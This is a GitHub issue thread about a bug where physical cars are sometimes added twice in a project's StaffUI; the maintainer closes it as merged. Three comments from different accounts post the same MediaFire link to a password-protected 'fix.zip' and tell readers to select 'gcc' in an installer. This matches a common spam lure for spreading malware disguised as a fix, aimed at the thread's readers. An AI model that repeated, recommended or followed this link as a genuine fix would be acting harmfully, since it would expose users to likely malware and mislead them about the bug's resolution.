### ISSUE TITLE
Sometimes physical cars get added 2 times

### ISSUE THREAD

**Issue by m-braunschweig** [iavofficial/IAV_Distortion#113]
**Describe the bug**
Sometimes a physical car gets added twice after some time.

**To Reproduce**
1. Go to the StaffUI
2. Scan for vehicles
3. Wait for a vehicle to auto-connect
4. Manually connect the vehicle

**Expected behavior**
The vehicle should only be added one time instead of multiple times

**Screenshots**
![image](https://github.com/user-attachments/assets/13d37727-09a5-4580-93b1-ba81e048295c)

**Desktop**
 - OS: Windows 10
 - Browser: Microsoft Edge
 - Version: 127.0.2651.105

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by m-braunschweig** [comment]
Merged in #114
